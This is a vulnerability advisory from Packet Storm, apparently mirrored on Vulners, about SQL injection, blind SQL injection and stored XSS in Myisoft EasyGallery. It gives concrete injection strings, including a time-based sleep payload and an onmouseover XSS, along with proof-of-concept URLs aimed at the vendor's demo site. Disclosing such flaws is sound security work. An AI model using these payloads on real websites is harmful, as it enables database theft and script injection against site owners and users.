Lucene search
K

Myisoft EasyGallery Cross Site Scripting / SQL Injection

🗓️ 05 Sep 2011 00:00:00Reported by Eyup CELIKType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 35 Views

Myisoft EasyGallery SQL Injection & Stored XS

Code
`# Exploit Title: MYISOFT EasyGallery SQL Injection - Blind SQL   
Injection - Stored XSS  
# Date: 2011  
# Author: Eyup CELIK  
# Version: All Version  
# Tested on: All versions are Vulnerability  
# Web Site: www.eyupcelik.com.tr  
  
  
ISSUE  
  
SQL Injection, Blind SQL Injection and XSS can be done using the command input  
  
Vulnerable Page:  
index.php  
  
  
Example:  
index.php?do=<SQL Injection Code>&page=register&PageSection=0  
index.php?catid=<SQL Injection Code>&page=category&PageSection=0  
index.php/<XSS Code>  
index.php?Go=Go&page=search&search=<Blind SQL Injection>  
  
  
Exploit:  
index.php?catid=1'&page=category&PageSection=0  
index.php/%27onmouseover=prompt(932505)%3E  
index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1 --  
  
  
POC:  
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php?catid=1'&page=category&PageSection=0  
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php/%27onmouseover=prompt(932505)%3E  
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1   
--  
  
  
  
Thanks,  
  
Eyup CELIK  
Information Technology Security Specialist  
http://www.eyupcelik.com.tr  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation